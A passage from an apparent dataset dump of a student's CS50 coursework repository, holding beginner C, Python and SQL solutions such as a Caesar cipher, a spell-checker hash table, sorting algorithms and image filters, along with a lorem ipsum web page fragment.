justo dui, congue sit amet urna vitae, dictum convallis ante. Maecenas risus orci, dictum non eros at, dictum tincidunt dui. Proin placerat leo a orci vulputate, in laoreet sapien pretium. Praesent vitae tellus vel magna dapibus congue. Maecenas aliquam odio sed risus dignissim dapibus. Vestibulum pharetra purus felis, id cursus turpis ullamcorper vel. Donec ullamcorper augue nec ipsum vulputate posuere. Phasellus vitae consectetur quam, ut fringilla augue.\n\nMaecenas malesuada aliquet justo, vel pulvinar eros pharetra in. Vivamus sed erat eu eros tempus egestas. Nullam volutpat consequat tincidunt. Etiam consequat semper mi ut tempus. Cras elementum nisl vitae gravida tristique. Suspendisse semper tempus orci, eget efficitur quam pretium ac. Nulla vitae felis non est pharetra bibendum ut ut orci. Vestibulum eget massa a elit efficitur tincidunt sed vulputate quam. Quisque luctus enim et volutpat vestibulum. Sed aliquam porta turpis eu viverra. Vestibulum eget auctor lacus, quis semper magna. Maecenas et semper nunc.\n\nMorbi condimentum ornare ante non facilisis. Morbi viverra nunc id vehicula facilisis. Suspendisse ac erat vulputate, venenatis justo quis, lobortis libero. Suspendisse non sagittis lacus. Nam ut ultrices nulla. Proin laoreet ante quis metus bibendum tristique. Duis vitae imperdiet ex. Praesent eu lacus non dolor condimentum pellentesque. Fusce sed posuere felis, sit amet tempus urna. Nam ante magna, aliquam ultrices semper quis, tristique quis libero. Quisque in enim eget urna egestas porta.\n\nVivamus orci massa, laoreet vitae diam at, lobortis imperdiet erat. Ut scelerisque nibh vel ipsum mattis tincidunt. Interdum et malesuada fames ac ante ipsum primis in faucibus. Ut euismod ligula eu laoreet pretium. Aliquam erat volutpat. Donec viverra justo ut urna placerat faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Integer facilisis felis rutrum, egestas arcu vitae, dignissim leo. Sed in urna at augue convallis imperdiet eu vel tortor. Maecenas vitae felis tincidunt, ullamcorper dolor ac, porta sapien. Etiam iaculis euismod eros ut commodo. Proin posuere vitae sapien eget faucibus. Mauris aliquam, ligula nec cursus bibendum, enim sem tempor libero, at tincidunt magna nisl suscipit dolor. Maecenas finibus rutrum diam, eu dictum nulla venenatis quis.\n\nMaecenas purus lacus, laoreet et quam eu, aliquam pharetra felis. Duis molestie hendrerit gravida. Donec et sollicitudin mauris. Aliquam augue leo, ullamcorper vel est et, dapibus bibendum augue. Pellentesque viverra nibh sit amet tristique porttitor. Nullam dignissim tortor felis, in iaculis ante interdum a. Vestibulum ac nibh mi. Morbi interdum felis id risus luctus luctus. Nunc sodales scelerisque massa, quis facilisis lorem mollis non. Nullam hendrerit tincidunt sapien in feugiat. Phasellus placerat convallis diam ac consectetur. Sed in diam lorem. Nulla facilisi. Pellentesque posuere auctor tristique. Nullam volutpat non lorem egestas porta. Donec ut tortor sed erat mattis pellentesque.\n </div>\n <div class=\"button\">\n <a href=\"https://youtu.be/FCPdIvXo2rU\" target=\"_blank\" class=\"btn\">Watch Video</a>\n <a href=\"#\" class=\"btn\">Learn More</a>\n </div>\n \n <script src=\"js/scripts.js\"></script>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.5489361882209778,
"alphanum_fraction": 0.5595744848251343,
"avg_line_length": 27.074626922607422,
"blob_id": "fd2f5b3f58fb603a6446092a89d412ba53ee34f7",
"content_id": "66b320f14711c5dc9ac2415e2d86593a7c072248",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1880,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 67,
"path": "/pset2/caesar.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n\n//function definition \nbool is_numeric(string str);\n\nint main(int argc, string argv[])\n{\n //if user does not provide the \"key\" stop the program\n if(argc < 2 || argc > 2 || !is_numeric(argv[1]))\n {\n printf(\"Usage: ./caesar key\\n\");\n return 1;\n }\n \n //get key to cypher\n int rotation = (int) strtol(argv[1], NULL, 10);\n \n //ask the user for the text that will be parsed\n string plaintext = get_string(\"plaintext: \");\n \n //length of the text\n int len = strlen(plaintext);\n char *ciphertext = malloc(strlen(plaintext) + 1);\n\n\n //Checks for the number of letters\n int ascii_code = 0;\n int new_code = 0;\n\n for (int i = 0, n = len; i < n; i++)\n {\n //Checks if a character is an alphanumeric character\n if (isalpha(plaintext[i]))\n {\n //choose the base of ASCII code depending if character is upper or lower.\n int base = isupper(plaintext[i]) ? 65 : 97;\n //get actual ascii code\n ascii_code = plaintext[i];\n //get new ascii code (if the rotation goes beyond the last letter (Z or z) it returns back to A or a\n new_code = (((ascii_code - base) + rotation) % 26) + base;\n ciphertext[i] = new_code;\n }\n else\n {\n //exclude all no alphanumeric characters \n ciphertext[i] = plaintext[i];\n } \n }\n printf(\"ciphertext: %s\\n\", ciphertext);\n}\n\nbool is_numeric(string str) \n{\n // loop Through each character in the string\n for(int i = 0, n = strlen(str); i < n; i++)\n {\n if(!isdigit(str[i])) // Check if a single character \"x\" its a digit\n {\n return false; // if its not return false\n } \n }\n return true; // else return true\n}"
},
{
"alpha_fraction": 0.5846675038337708,
"alphanum_fraction": 0.5905172228813171,
"avg_line_length": 19.173913955688477,
"blob_id": "cc9d45f2db598574c8afab4149e070e09378dd8a",
"content_id": "8c7af97aac269f9a617bdc5a245ae721105f90cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3248,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 161,
"path": "/pset5/speller/dictionary.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "// Implements a dictionary's functionality\n\n#include <stdbool.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include <ctype.h>\n\n#include \"dictionary.h\"\n\n// Represents a node in a hash table\ntypedef struct node\n{\n char word[LENGTH + 1];\n struct node *next;\n}\nnode;\n\nnode *add_node(node *p, char *word);\nnode *remove_node (node *p);\n\n// Number of buckets in hash table\nconst unsigned int HASH_T_SIZE = 100;\n\n// Number of words in dicctionary\nunsigned long words_counter = 0;\n\n// Hash table\nnode *hash_table[HASH_T_SIZE];\n\n// Returns true if word is in dictionary else false\nbool check(const char *word)\n{\n // String to lowercase\n char term[strlen(word) + 1];\n strcpy(term, word);\n for (int i = 0; i < strlen(word); i++)\n {\n term[i] = tolower(word[i]);\n } \n\n // Get the hash value for a word\n int hash_value = hash(term) % HASH_T_SIZE;\n \n node *dict = hash_table[hash_value];\n\n // Iterate the list\n while (dict != NULL)\n {\n if (strcasecmp(dict->word, word) == 0)\n {\n return true;\n }\n // Move list pointer\n dict = dict->next;\n }\n\n return false;\n}\n\n// Hashes word to a number.. \nunsigned long hash(const char *word)\n{\n //djb2 hash function from http://www.cse.yorku.ca/~oz/hash.html\n unsigned long hash = 5381;\n int c;\n\n while ((c = *word++))\n {\n hash = ((hash << 5) + hash) + c; /* hash * 33 + c */\n }\n return hash;\n}\n\n// Loads dictionary into memory, returning true if successful else false\nbool load(const char *dictionary)\n{\n words_counter = 0;\n\n // Open dictionary file \n FILE *file = fopen(dictionary, \"r\");\n if (file == NULL)\n {\n return false;\n }\n\n // Allocate memory\n char *word = malloc(sizeof(char) * LENGTH);\n\n while (fscanf(file, \"%s\", word) != EOF)\n {\n // Add words to hash table\n int hash_value = hash(word) % HASH_T_SIZE;\n // Iterate over dictionary\n hash_table[hash_value] = add_node(hash_table[hash_value], word);\n words_counter++;\n }\n\n // Free allocated memory\n free(word);\n\n // Close dictionary\n fclose(file);\n\n return true;\n\n}\n\n// Returns number of words in dictionary if loaded else 0 if not yet loaded\nunsigned int size(void)\n{\n // Counter\n return words_counter;\n}\n\n// Unloads dictionary from memory, returning true if successful else false\nbool unload(void)\n{\n // Iterate over hash table\n for (int i = 0; i < HASH_T_SIZE; i++)\n {\n // Remove linked list connected to the pointer\n while (hash_table[i] != NULL)\n {\n hash_table[i] = remove_node(hash_table[i]);\n }\n }\n\n return true;\n}\n\n\n// Auxiliar functions that manage the nodes list\nnode *add_node(node *p, char *word)\n{\n // Allocate some memory for the node\n node *n = malloc(sizeof(node));\n if (n == NULL)\n {\n return NULL;\n }\n // Copy dictionary word in the node\n strcpy(n -> word, word);\n\n // Point to the new node\n n -> next = p;\n\n return n;\n}\n\nnode *remove_node (node *p)\n{\n // Temporary pointer to the next node of that we want to remove\n node *n = p->next;\n\n free(p);\n\n // Return the new node where pointed at\n return n;\n\n}\n"
},
{
"alpha_fraction": 0.5096079707145691,
"alphanum_fraction": 0.5549577474594116,
"avg_line_length": 25.571428298950195,
"blob_id": "96378bbe62bc19739e7947f220edb8cfd03b24e9",
"content_id": "9d046b3e1f62a50a40f7d1028e101143e643de59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1301,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 49,
"path": "/pset6/readability/readability.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\n\ndef main():\n # ask the user for the text to be parsed\n text = cs50.get_string(\"Text: \")\n\n # length of the string\n length = len(text)\n\n # initialise some variables\n letters = 0\n sentences = 0\n words = len(text.split(\" \"))\n\n \n\n\n # check for the number of letters\n for i in range(0, length):\n # check if character is alphanumeric \n if text[i].isalnum():\n letters += 1\n # check if character is a space\n # elif text[i].isspace() or text[i] == \"\\0\":\n # words += 1\n elif text[i] == \".\" or text[i] == \"!\" or text[i] == \"?\":\n sentences += 1\n\n # calculate L & S of Coleman-Liau index\n # to be precised we must cast the integers into floats first\n L = float(letters) / float(words) * 100.00\n S = float(sentences) / float(words) * 100.00\n\n # calculate the index of readability of Coleman-Liau.\n # the formula is: index = 0.0588 * L - 0.296 * S - 15.8\n index = round(0.0588 * L - 0.296 * S - 15.8)\n\n grade = \"Grade\"\n # if grade is between 1 and 16\n if index >= 1 and index <= 16:\n print(f\"{grade} {index}\")\n # index is higher that 16\n elif index > 16:\n print(f\"{grade} 16+\")\n # grade index below 1\n else:\n print(\"Before Grade 1\")\n\nmain()"
},
{
"alpha_fraction": 0.5766369104385376,
"alphanum_fraction": 0.5877976417541504,
"avg_line_length": 29.272727966308594,
"blob_id": "8440f1ca2fef9b825865fe54f55ebb47e783ef31",
"content_id": "3d80d68698d1c694ed8f9661f42ed635c2c556b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1345,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 44,
"path": "/pset7/houses/import.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import cs50\nimport csv\nfrom sys import argv, exit\nfrom cs50 import SQL\n\n\n# number of arguments\nargc = len(argv)\n\n# if there aren't two params with data and sequence then exit\nif argc != 2:\n print(\"Usage: import.py characters.csv\")\n exit(1)\n\n# get data file path + name\nfname = argv[1]\n\n# if they don't fit the expected extension then exit\nif not fname.endswith(\".csv\"):\n print(\"Usage: import.py characters.csv\")\n exit(1)\n\n# connect to db file\nstudentsdb = SQL(\"sqlite:///students.db\")\n# open the files\nwith open(fname, \"r\") as characters:\n \n dic = csv.DictReader(characters, delimiter=\",\")\n for row in dic:\n\n name = row[\"name\"]\n name_list = name.split()\n\n if len(name_list) == 2:\n first_name = name_list[0]\n last_name = name_list[1]\n studentsdb.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES(?, ?, ?, ?, ?)\",\n first_name, None, last_name, row[\"house\"], row[\"birth\"])\n elif len(name_list) == 3:\n first_name = name_list[0]\n middle_name = name_list[1]\n last_name = name_list[2]\n studentsdb.execute(\"INSERT INTO students (first, middle, last, house, birth) VALUES(?, ?, ?, ?, ?)\",\n first_name, middle_name, last_name, row[\"house\"], row[\"birth\"])\n\n \n\n\n"
},
{
"alpha_fraction": 0.42335766553878784,
"alphanum_fraction": 0.43065693974494934,
"avg_line_length": 12.75,
"blob_id": "9158bd69b23344a1e1d4e33eab31f25cfede3051",
"content_id": "f37a9c89e5bddf220e1d1c327fe45fb1d6144d34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 274,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 20,
"path": "/pset3/swap.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\nvoid swap (int *a, int *b);\n\nint main (void)\n{\n int x = 4, y = 8;\n\n printf(\"x: %i, y: %i\\n\", x, y);\n swap(&x, &y);\n printf(\"x: %i, y: %i\\n\", x, y);\n}\n\nvoid swap (int *a, int *b)\n{\n int t = *a;\n *a = *b;\n *b = t;\n}"
},
{
"alpha_fraction": 0.3958809971809387,
"alphanum_fraction": 0.4038901627063751,
"avg_line_length": 20.317073822021484,
"blob_id": "a372396736618b5ec9323d23887af1c3639df523",
"content_id": "2e3eb5a23007c3e0ef864cf6ef594e12df7662e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 874,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/pset1/mariomore.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <cs50.h>\n#include <stdio.h>\n\nint main(void)\n{\n //get height value from user\n bool error = true;\n int height = 0;\n //ask until valid height value\n do\n {\n height = get_int(\"Height: \");\n if (height >= 1 && height <= 8)\n {\n error = false;\n }\n }\n while(error);\n\n //loop for pyramid height\n for (int i = 1; i <= height; i++)\n {\n //loop to draw the pyramid blocks\n for (int j = 1; j <= height + i ; j++)\n {\n if (j > height - i){\n printf(\"#\");\n }\n else{\n printf(\" \");\n }\n //if we have finished first side of the pyramid add empty spaces\n if (j == height)\n {\n printf(\" \");\n }\n }\n //insert a new line\n printf(\"\\n\");\n }\n}\n"
},
{
"alpha_fraction": 0.657489001750946,
"alphanum_fraction": 0.6640968918800354,
"avg_line_length": 35.36000061035156,
"blob_id": "38a4c501ab5dc5e53ef492d20f44ca08f10fa65d",
"content_id": "e016daa7a3ab10a8959513bd4d716a909935ac5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 908,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 25,
"path": "/pset7/houses/roster.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "import csv\nfrom sys import argv, exit\nfrom cs50 import SQL\n\n# create an array with the house names\nhouseslist = [\"Gryffindor\", \"Slytherin\", \"Hufflepuff\", \"Ravenclaw\"]\n\n# check that the script recevies a param with the name file and the name is into the list\nif len(argv) != 2 or not argv[1] in houseslist:\n print(\"Usage: python roster.py house\")\n exit(1)\n\nhousename = argv[1]\n# open the database file\ndb = SQL(\"sqlite:///students.db\")\n\n# get the list of houses\nhouse = db.execute(\"SELECT first, middle, last, birth FROM students WHERE house = (?) ORDER BY last, first\", housename)\n\n#go through the house getting students' data\nfor student in house:\n if student[\"middle\"] == None:\n print(student[\"first\"] + \" \" + student[\"last\"] + \", born \" + str(student[\"birth\"]))\n else:\n print(student[\"first\"] + \" \" + student[\"middle\"] + \" \" + student[\"last\"] + \", born \" + str(student[\"birth\"]))"
},
{
"alpha_fraction": 0.47590869665145874,
"alphanum_fraction": 0.4987320303916931,
"avg_line_length": 19.413793563842773,
"blob_id": "53e82a3d12fb6828f735f9b0fa0389314daac464",
"content_id": "54cd178925b24e47392aeb3e54dbfd09f04d97dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1183,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 58,
"path": "/algorithms/insertionsort.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nvoid insertion_sort(int list[], int size);\nint print_array(int size, int array[]);\n\nint main(void)\n{\n int n;\n int list[] = { 4,3, 2, 10, 12, 1, 5, 6};\n \n int size = sizeof list / sizeof list[0];\n printf(\"Initial array: \");\n print_array(size, list);\n\n //start timer\n clock_t c0 = clock();\n\n //order the array\n printf(\"sorting....\\n\");\n insertion_sort(list, size);\n \n //stop timer\n clock_t c2 = clock();\n printf(\"Ordered array: \");\n print_array(size, list);\n \n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"Sorting took %f ms\\n\", total_diff_ms);\n}\n\nvoid insertion_sort(int list[], int size)\n{\n int tmp, j;\n \n for (int i = 0; i < size; i++)\n {\n tmp = list[i];\n j = i;\n while (j > 0 && tmp < list[j-1])\n {\n list[j] = list[j-1];\n j = j -1;\n } \n print_array(size, list); \n }\n}\n\nint print_array(int size, int array[])\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.4769904911518097,
"alphanum_fraction": 0.49671292304992676,
"avg_line_length": 19.44776153564453,
"blob_id": "c25db99c91e0495034e6bcdb368c7c988b41ccbb",
"content_id": "14879e5bf667da2ce80c7f6630eedfa0b5125b59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 67,
"path": "/algorithms/bubblesorting.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#include <time.h>\n\nvoid bubble_sorting(int arr[], int size);\nvoid swap(int *xp, int *yp);\nint print_array(int size, int array[]);\n\nint main(void)\n{\n int n;\n int list[] = { 6,3, 8, 5, 2, 7, 4, 1};\n\n int found = -1;\n \n int size = sizeof list / sizeof list[0];\n printf(\"Initial array: \");\n print_array(size, list);\n //order the array\n \n printf(\"sorting...\\n\");\n //start timer\n clock_t c0 = clock();\n bubble_sorting(list, size);\n \n //stop timer\n clock_t c2 = clock();\n printf(\"Ordered array: \");\n print_array(size, list);\n \n double total_diff_ms = (c2 - c0) * 1000. / CLOCKS_PER_SEC;\n printf(\"Sorting took %f ms\\n\", total_diff_ms);\n}\n\nvoid bubble_sorting(int arr[], int size)\n{\n for (int i = 0; i < size-1; i++)\n {\n for (int j = 0; j < size-i-1; j++)\n {\n if (arr[j] > arr[j+1])\n {\n swap(&arr[j], &arr[j+1]);\n }\n }\n print_array(size, arr);\n }\n\n}\n\nvoid swap(int *ap, int *bp) \n{ \n //swap the pointer to each value and that's all :D\n int temp = *ap; \n *ap = *bp; \n *bp = temp; \n} \n\nint print_array(int size, int array[])\n{\n for (int i = 0; i < size; i++)\n {\n i < size-1 ? printf(\"%i, \", array[i]) : printf(\"%i\", array[i]);\n }\n printf(\"\\n\");\n return 0;\n}"
},
{
"alpha_fraction": 0.502109706401825,
"alphanum_fraction": 0.5253164768218994,
"avg_line_length": 24,
"blob_id": "897caa983ca8fab2ac53cdbcb1828e00eae7c6a7",
"content_id": "c5659feae27b5bc1fc79e7099ace2c9eeaf888f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 19,
"path": "/pset6/mario/less/mario.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\n\n#ask until valid height value\nwhile True:\n height = cs50.get_int(\"Height: \")\n if height >= 1 and height <= 8:\n break\n# loop for pyramid height\nfor i in range (1, height+1):\n # loop to draw the pyramid blocks\n for base in range (height, 0, -1):\n # print(f\"i: {i}, b: {base}\")\n if base <= i:\n print(\"#\", end=\"\")\n else:\n print(\" \", end=\"\")\n # insert a new line\n print(\"\", end=\"\\n\")"
},
{
"alpha_fraction": 0.5928571224212646,
"alphanum_fraction": 0.6142857074737549,
"avg_line_length": 21.13157844543457,
"blob_id": "e06d8b6747fcac437c33e3218138bc2f8f3e0869",
"content_id": "eaa9ba6a307a4befa2e9325c830ddcb87e70548e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 38,
"path": "/pset6/cash/cash.py",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#!/bin/python3\nimport cs50\nimport math\n\ndef main():\n\n # array of coins\n coin_array = [25, 10, 5, 1]\n\n while True:\n # ask for the change owed\n dollars = cs50.get_float(\"Change owed: \")\n if dollars >= 0:\n break\n \n # round input to cents \n cents = round(dollars * 100)\n coins = findCoins(cents, coin_array, 0);\n\n\n # recursive function call to get coins amount\n print(\"\", coins);\n\n\n# recursive function\ndef findCoins(cents, coin_array, position):\n # get the number of coins of selected\n coins = round (cents // coin_array[position])\n remain = round(cents % coin_array[position])\n \n # this is the condition to exit from recursion\n if remain != 0:\n # call function recursively\n coins += findCoins(remain, coin_array, position +1)\n return coins\n\n\nmain()"
},
{
"alpha_fraction": 0.46501925587654114,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 27.587156295776367,
"blob_id": "bbaef0f9958c2c4b0e18800e46014d8428c834e5",
"content_id": "d96f208b12dc590e0c40009a4bd5f6823d4796f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3116,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 109,
"path": "/pset4/filter-more/helpers.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include \"helpers.h\"\n\n// Convert image to grayscale\nvoid grayscale(int height, int width, RGBTRIPLE image[height][width])\n{\n //go through the image\n for (int i = 0; i < height; i++)\n {\n int gray_value;\n for (int j = 0; j < width; j++)\n {\n //calculate the average of the colour channels\n gray_value = round((image[i][j].rgbtBlue + image[i][j].rgbtGreen + image[i][j].rgbtRed) / 3.0);\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = gray_value;\n image[i][j].rgbtGreen = gray_value;\n image[i][j].rgbtRed = gray_value;\n }\n }\n}\n\n// Reflect image horizontally\nvoid reflect(int height, int width, RGBTRIPLE image[height][width])\n{\n //temporal var\n RGBTRIPLE tmp;\n\n int mid;\n //depending if the width is even or odd we calculate a bit different to optimize the calculations\n if (width % 2 == 0)\n {\n mid = (width / 2) - 1;\n }\n else\n {\n mid = width / 2;\n }\n //go through the image\n for (int i = 0; i < height; i++)\n {\n //now we iterate till the mid pixel, not through the whole row\n for (int j = 0; j <= mid; j++)\n {\n //we have to swap values from the pixel that is 'mirroring'\n int mirror = width - j - 1;\n tmp = image[i][j];\n image[i][j] = image[i][mirror];\n image[i][mirror] = tmp;\n }\n }\n}\n\n// Blur image\nvoid blur(int height, int width, RGBTRIPLE image[height][width])\n{\n float counter;\n int sumblue, sumgreen, sumred;\n int x;\n int y;\n //temporary image to store new values\n RGBTRIPLE imgtemp [height][width];\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n counter = 0.0;\n sumred = 0;\n sumgreen = 0;\n sumblue = 0;\n \n //now we start iterating through a sub-array around the pixel\n \n for (int h = -1; h <= 1; h++)\n {\n x = i + h;\n for (int w = -1; w <= 1; w ++)\n {\n y = j + w;\n\n if ((x >= 0 && y >= 0) && (x < height && y < width))\n {\n sumred += image[x][y].rgbtRed;\n sumgreen += image[x][y].rgbtGreen;\n sumblue += image[x][y].rgbtBlue;\n counter++;\n }\n }\n }\n imgtemp[i][j].rgbtRed = round(sumred / counter);\n imgtemp[i][j].rgbtGreen = round(sumgreen / counter);\n imgtemp[i][j].rgbtBlue = round(sumblue / counter);\n }\n }\n for (int i = 0; i < height; i++)\n {\n for (int j = 0; j < width; j++)\n {\n image[i][j].rgbtRed = imgtemp[i][j].rgbtRed;\n image[i][j].rgbtGreen = imgtemp[i][j].rgbtGreen;\n image[i][j].rgbtBlue = imgtemp[i][j].rgbtBlue;\n }\n }\n}\n\n// Detect edges\nvoid edges(int height, int width, RGBTRIPLE image[height][width])\n{\n return;\n}\n"
},
{
"alpha_fraction": 0.5460993051528931,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 20.769229888916016,
"blob_id": "2bcd6a0a32f7f434d688d9fdd58f47142fb2bacf",
"content_id": "9c4449166397b5e1cbf83951fbd2c413c6ec70a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 13,
"path": "/pset2/commandline.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <cs50.h>\n\nint main(int argc, string argv[])\n{\n if(argc != 2)\n {\n printf(\"arguments error on command line; only %i arguments.\\n\", argc);\n return -1;\n }\n printf(\"Hello, %s\\n\", argv[1]);\n printf(\"Argument number: %i\\n\", argc);\n}"
},
{
"alpha_fraction": 0.7197452187538147,
"alphanum_fraction": 0.7452229261398315,
"avg_line_length": 38.5,
"blob_id": "6649b23ed8b8dd94edf7010162f4f9a942756bb0",
"content_id": "4cb59566317777e3d2d4cfdd63207f75a1b4fd18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 4,
"path": "/pset7/movies/7.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT m.title, r.rating FROM movies m\nINNER JOIN ratings r ON m.id = r.movie_id \nWHERE year = 2010 and r.rating IS NOT NULL\nORDER BY rating DESC, title ASC"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33,
"blob_id": "fa4377227f58edc9dd2bbdae93aea26db8cbf5af",
"content_id": "02ffa770deaae108f24a5ead20849a9246a0eb1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 305,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/pset7/movies/12.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT DISTINCT (m.title) FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nWHERE p.name = 'Johnny Depp'\nINTERSECT\nSELECT DISTINCT (m.title) FROM movies m\nINNER JOIN people p ON p.id = s.person_id\nINNER JOIN stars s ON s.movie_id = m.id\nWHERE p.name = 'Helena Bonham Carter'"
},
{
"alpha_fraction": 0.547397792339325,
"alphanum_fraction": 0.571561336517334,
"avg_line_length": 33.74193572998047,
"blob_id": "1582ed0890a26a329f1b23e892c769c6edc62908",
"content_id": "3cccbea9700563f8a485fa09459b98fec996f7db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1076,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 31,
"path": "/pset3/test.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n#define INITIAL_CAPACITY 2\n\nvoid push(int *arr, int index, int value, int *size, int *capacity){\n if(*size > *capacity){\n arr = realloc(arr, (*size + 1) * sizeof(int));\n *capacity = *size + 1;\n //printf(\"capacity: %d\\n\", *capacity);\n }\n arr[index] = value;\n *size = *size + 1;\n}\nint main(){\n int size = 0;\n int capacity = INITIAL_CAPACITY;\n int* arr = malloc(INITIAL_CAPACITY * sizeof(int));\n push(arr, 0, 9, &size, &capacity);\n push(arr, 1, 2, &size, &capacity);\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n push(arr, 2, 3, &size, &capacity);\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n \n printf(\"Current capacity: %d\\n\", capacity); // Current capacity: 2\n push(arr, 3, 4, &size, &capacity);\n push(arr, 4, 5, &size, &capacity);\n push(arr, 5, 6, &size, &capacity);\n \n printf(\"Current capacity: %d\\n\", capacity); // Current capacity: 16\n printf(\"Current size: %d\\n\", size); // Current capacity: 16\n}"
},
{
"alpha_fraction": 0.48884379863739014,
"alphanum_fraction": 0.5118322968482971,
"avg_line_length": 31.632352828979492,
"blob_id": "03542ad3ffa0ef7a162b646c25ea1fe970b6deb8",
"content_id": "23a4b595334720f04f8d2a34b48b1069bcd4d598",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 4437,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 136,
"path": "/pset4/filter-less/helpers.c",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "#include \"helpers.h\"\n#include <math.h>\n\nint checkpixvalue(int channel_value);\n\n// Convert image to grayscale\nvoid grayscale(int height, int width, RGBTRIPLE image[height][width])\n{\n //go through the image\n for (int i = 0; i < height; i++)\n {\n int gray_value;\n for (int j = 0; j < width; j++)\n {\n //calculate the average of the colour channels\n gray_value = round((image[i][j].rgbtBlue + image[i][j].rgbtGreen + image[i][j].rgbtRed) / 3.0);\n //assign the grey value to the different channels\n image[i][j].rgbtBlue = gray_value;\n image[i][j].rgbtGreen = gray_value;\n image[i][j].rgbtRed = gray_value;\n }\n }\n}\n\n// Convert image to sepia\nvoid sepia(int height, int width, RGBTRIPLE image[height][width])\n{\n //sepia formula\n // sepiaRed = .393 * originalRed + .769 * originalGreen + .189 * originalBlue\n // sepiaGreen = .349 * originalRed + .686 * originalGreen + .168 * originalBlue\n // sepiaBlue = .272 * originalRed + .534 * originalGreen + .131 * originalBlue\n int sepiared = 0, sepiagreen = 0, sepiablue = 0;\n //go through the image\n for (int i = 0; i < height; 